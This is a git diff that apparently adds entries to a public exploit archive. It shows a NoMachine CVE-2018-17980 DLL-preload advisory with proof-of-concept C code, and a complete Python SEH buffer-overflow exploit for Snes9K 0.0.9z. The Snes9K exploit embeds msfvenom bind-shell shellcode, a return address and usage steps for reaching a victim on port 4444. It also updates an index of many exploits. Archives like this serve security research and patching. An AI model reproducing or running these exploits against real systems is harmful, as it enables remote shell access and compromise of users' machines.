+CVE-2018-17980
+
+
+[Security Issue]
+Possible arbitrary code execution when opening a ".nxs" nomachine file type on client's wintab32.dll preload.
+This issue regards the client part of all NoMachine installations on Windows (NoMachine free, NoMachine Enterprise Client, NoMachine Enteprise Desktop and NoMachine Cloud Server).
+
+1) create a 32 bit DLL named "wintab32.dll"
+2) create an native nomachine ".NXS" file and open it alongside the trojan "wintab32.dll" DLL from Network share or any dir.
+BOOM!
+
+
+[References]
+https://www.nomachine.com/TR10P08887
+
+
+
+[Exploit/POC]
+
+#include <windows.h>
+
+/* hyp3rlinx */
+
+/*
+gcc -c -m32 wintab32.c
+gcc -shared -m32 -o wintab32.dll wintab32.o
+*/
+
+void executo(){
+ MessageBox( 0, "3c184981367094fce3ab70efc3b44583" , ":)" , MB_YESNO + MB_ICONQUESTION );
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
+ switch(fdwReason){
+  case DLL_PROCESS_ATTACH:{
+	executo();
+	break;
+	}
+  case DLL_PROCESS_DETACH:{
+	executo();
+	break;
+	}
+  case DLL_THREAD_ATTACH:{
+	executo();
+	break;
+       }
+  case DLL_THREAD_DETACH:{
+	executo();
+	break;
+	}
+   }
+	return TRUE;
+}
+
+
+[Network Access]
+Remote
+
+
+
+[Severity]
+High
+
+
+
+[Disclosure Timeline]
+Vendor Notification: September 26, 2018
+Vendor verified vulnerability: September 28, 2018
+CVE assigned by Mitre: October 4, 2018
+Vendor release fixed version: October 11, 2018
+October 11, 2018 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows_x86/local/45598.py b/exploits/windows_x86/local/45598.py
new file mode 100755
index 000000000..e6f89d233
--- /dev/null
+++ b/exploits/windows_x86/local/45598.py
@@ -0,0 +1,58 @@
+# Exploit Title: Snes9K 0.0.9z - Buffer Overflow (SEH)
+# Date: 2018-10-13
+# Exploit Author: Abdullah Alıç
+# Vendor Homepage: https://sourceforge.net/projects/snes9k/
+# Software Link: https://sourceforge.net/projects/snes9k/files/latest/download
+# Version: 0.0.9z
+# Tested on: Windows XP Professional sp3(ENG) 
+# Category: Windows Local Exploit
+# How to use: open the program go to "Netplay --> Options" paste the contents of boom.txt 
+# in  Socket Port Number --> Connect victim machine on port 4444   
+#!/usr/bin/python
+
+#msfvenom -p windows/shell_bind_tcp  -b "\x00\x0a\x0d\x9f\x8f\x8e\x8d\x9e\x9d\xd0\xdd\xfd\xfe\xf0\xde" -f python
+#352 bytes
+buf =  ""
+buf += "\x2b\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81"
+buf += "\x76\x0e\x43\x2b\x2a\x41\x83\xee\xfc\xe2\xf4\xbf\xc3"
+buf += "\xa8\x41\x43\x2b\x4a\xc8\xa6\x1a\xea\x25\xc8\x7b\x1a"
+buf += "\xca\x11\x27\xa1\x13\x57\xa0\x58\x69\x4c\x9c\x60\x67"
+buf += "\x72\xd4\x86\x7d\x22\x57\x28\x6d\x63\xea\xe5\x4c\x42"
+buf += "\xec\xc8\xb3\x11\x7c\xa1\x13\x53\xa0\x60\x7d\xc8\x67"
+buf += "\x3b\x39\xa0\x63\x2b\x90\x12\xa0\x73\x61\x42\xf8\xa1"
+buf += "\x08\x5b\xc8\x10\x08\xc8\x1f\xa1\x40\x95\x1a\xd5\xed"
+buf += "\x82\xe4\x27\x40\x84\x13\xca\x34\xb5\x28\x57\xb9\x78"
+buf += "\x56\x0e\x34\xa7\x73\xa1\x19\x67\x2a\xf9\x27\xc8\x27"
+buf += "\x61\xca\x1b\x37\x2b\x92\xc8\x2f\xa1\x40\x93\xa2\x6e"
+buf += "\x65\x67\x70\x71\x20\x1a\x71\x7b\xbe\xa3\x74\x75\x1b"
+buf += "\xc8\x39\xc1\xcc\x1e\x43\x19\x73\x43\x2b\x42\x36\x30"
+buf += "\x19\x75\x15\x2b\x67\x5d\x67\x44\xd4\xff\xf9\xd3\x2a"
+buf += "\x2a\x41\x6a\xef\x7e\x11\x2b\x02\xaa\x2a\x43\xd4\xff"
+buf += "\x2b\x4b\x72\x7a\xa3\xbe\x6b\x7a\x01\x13\x43\xc0\x4e"
+buf += "\x9c\xcb\xd5\x94\xd4\x43\x28\x41\x52\x77\xa3\xa7\x29"
+buf += "\x3b\x7c\x16\x2b\xe9\xf1\x76\x24\xd4\xff\x16\x2b\x9c"
+buf += "\xc3\x79\xbc\xd4\xff\x16\x2b\x5f\xc6\x7a\xa2\xd4\xff"
+buf += "\x16\xd4\x43\x5f\x2f\x0e\x4a\xd5\x94\x2b\x48\x47\x25"
+buf += "\x43\xa2\xc9\x16\x14\x7c\x1b\xb7\x29\x39\x73\x17\xa1"
+buf += "\xd6\x4c\x86\x07\x0f\x16\x40\x42\xa6\x6e\x65\x53\xed"
+buf += "\x2a\x05\x17\x7b\x7c\x17\x15\x6d\x7c\x0f\x15\x7d\x79"
+buf += "\x17\x2b\x52\xe6\x7e\xc5\xd4\xff\xc8\xa3\x65\x7c\x07"
+buf += "\xbc\x1b\x42\x49\xc4\x36\x4a\xbe\x96\x90\xda\xf4\xe1"
+buf += "\x7d\x42\xe7\xd6\x96\xb7\xbe\x96\x17\x2c\x3d\x49\xab"
+buf += "\xd1\xa1\x36\x2e\x91\x06\x50\x59\x45\x2b\x43\x78\xd5"
+buf += "\x94"
+
+nseh= "\xeb\x06\x90\x90" 
+seh = "\x39\x1f\xd1\x72" #POP-POP-RET msacm32.drv
+
+buffer = "\x90" * 244 +  nseh + seh + buf + "\x90"*20
+
+payload = buffer
+try:
+    f=open("boom.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 4a0070425..79dedaf9f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10031,6 +10031,7 @@ id,file,description,date,author,type,platform,port
 45583,exploits/windows/local/45583.txt,"Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection",2018-10-11,hyp3rlinx,local,windows,
 45585,exploits/windows/local/45585.txt,"Microsoft SQL Server Management Studio 17.9 - '.xel' XML External Entity Injection",2018-10-11,hyp3rlinx,local,windows,
 45587,exploits/windows/local/45587.txt,"Microsoft SQL Server Management Studio 17.9 - '.xmla' XML External Entity Injection",2018-10-11,hyp3rlinx,local,windows,
+45598,exploits/windows_x86/local/45598.py,"Snes9K 0.0.9z - Buffer Overflow (SEH)",2018-10-15,"Abdullah Alıç",local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16868,6 +16869,7 @@ id,file,description,date,author,type,platform,port
 45559,exploits/linux/remote/45559.rb,"Unitrends UEB - HTTP API Remote Code Execution (Metasploit)",2018-10-08,Metasploit,remote,linux,443
 45561,exploits/php/remote/45561.rb,"Navigate CMS - Unauthenticated Remote Code Execution (Metasploit)",2018-10-08,Metasploit,remote,php,
 45574,exploits/windows/remote/45574.rb,"Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit)",2018-10-09,Metasploit,remote,windows,502
+45611,exploits/windows/remote/45611.c,"NoMachine < 5.3.27 - Remote Code Execution",2018-10-15,hyp3rlinx,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39512,6 +39514,7 @@ id,file,description,date,author,type,platform,port
 44164,exploits/php/webapps/44164.txt,"Joomla! Component Proclaim 9.1.1 - Arbitrary File Upload",2018-02-22,"Ihsan Sencan",webapps,php,
 44165,exploits/php/webapps/44165.txt,"Joomla! Component OS Property Real Estate 3.12.7 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php,
 44166,exploits/jsp/webapps/44166.txt,"Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities",2018-02-22,"Core Security",webapps,jsp,
+45605,exploits/php/webapps/45605.txt,"MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,
 44186,exploits/php/webapps/44186.txt,"MyBB My Arcade Plugin 1.3 - Cross-Site Scripting",2018-02-27,0xB9,webapps,php,
 44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple,
 44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,
@@ -39779,6 +39782,8 @@ id,file,description,date,author,type,platform,port
 44775,exploits/php/webapps/44775.txt,"ClipperCMS 1.3.3 - Cross-Site Scripting",2018-05-27,"Nathu Nandwani",webapps,php,
 44777,exploits/php/webapps/44777.txt,"My Directory 2.0 - SQL Injection / Cross-Site Scripting",2018-05-27,AkkuS,webapps,php,
 44778,exploits/php/webapps/44778.txt,"Baby Names Search Engine 1.0 - 'a' SQL Injection",2018-05-27,AkkuS,webapps,php,
+45607,exploits/hardware/webapps/45607.txt,"FLIR Brickstream 3D+ - RTSP Stream Disclosure",2018-10-15,LiquidWorm,webapps,hardware,
+45606,exploits/hardware/webapps/45606.txt,"FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure",2018-10-15,LiquidWorm,webapps,hardware,
 44781,exploits/hardware/webapps/44781.txt,"TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass",2018-05-28,"BlackFog Team",webapps,hardware,
 44782,exploits/php/webapps/44782.txt,"DomainMod 4.09.03 - 'oid' Cross-Site Scripting",2018-05-28,longer,webapps,php,
 44783,exploits/php/webapps/44783.txt,"DomainMod 4.09.03 - 'sslpaid' Cross-Site Scripting",2018-05-28,longer,webapps,php,
@@ -40110,7 +40115,18 @@ id,file,description,date,author,type,platform,port
 45589,exploits/php/webapps/45589.txt,"LUYA CMS 1.0.12 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,php,
 45590,exploits/windows/webapps/45590.py,"Phoenix Contact WebVisit 2985725 - Authentication Bypass",2018-10-12,Photubias,webapps,windows,
 45591,exploits/php/webapps/45591.txt,"HaPe PKH 1.1 - Cross-Site Request Forgery (Update Admin)",2018-10-12,"Ihsan Sencan",webapps,php,
-45592,exploits/php/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,php,
+45592,exploits/ruby/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,ruby,
 45593,exploits/php/webapps/45593.txt,"HaPe PKH 1.1 - Arbitrary File Upload",2018-10-12,"Ihsan Sencan",webapps,php,
 45594,exploits/php/webapps/45594.txt,"SugarCRM 6.5.26 - Cross-Site Scripting",2018-10-12,"Purplemet Security",webapps,php,
 45595,exploits/multiple/webapps/45595.py,"FluxBB < 1.5.6 - SQL Injection",2014-11-21,secthrowaway,webapps,multiple,
+45596,exploits/php/webapps/45596.txt,"Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,
+45597,exploits/hardware/webapps/45597.txt,"FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure",2018-10-15,LiquidWorm,webapps,hardware,
+45599,exploits/hardware/webapps/45599.txt,"FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure",2018-10-15,LiquidWorm,webapps,hardware,
+45600,exploits/php/webapps/45600.txt,"Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)",2018-10-15,"Ihsan Sencan",webapps,php,
+45601,exploits/ruby/webapps/45601.txt,"AlchemyCMS 4.1 - Cross-Site Scripting",2018-10-15,"Ismail Tasdelen",webapps,ruby,
+45602,exploits/hardware/webapps/45602.py,"FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution",2018-10-15,LiquidWorm,webapps,hardware,
+45603,exploits/php/webapps/45603.txt,"College Notes Management System 1.0 - 'user' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,
+45604,exploits/php/webapps/45604.txt,"Advanced HRM 1.6 - Remote Code Execution",2018-10-15,"Renos Nikolaou",webapps,php,
+45610,exploits/php/webapps/45610.txt,"Centos Web Panel 0.9.8.480 - Multiple Vulnerabilities",2018-10-15,seccops,webapps,php,
+45612,exploits/php/webapps/45612.php,"Academic Timetable Final Build 7.0 - Information Disclosure",2018-10-15,"Ihsan Sencan",webapps,php,
+45613,exploits/php/webapps/45613.txt,"KORA 2.7.0 - 'cid' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,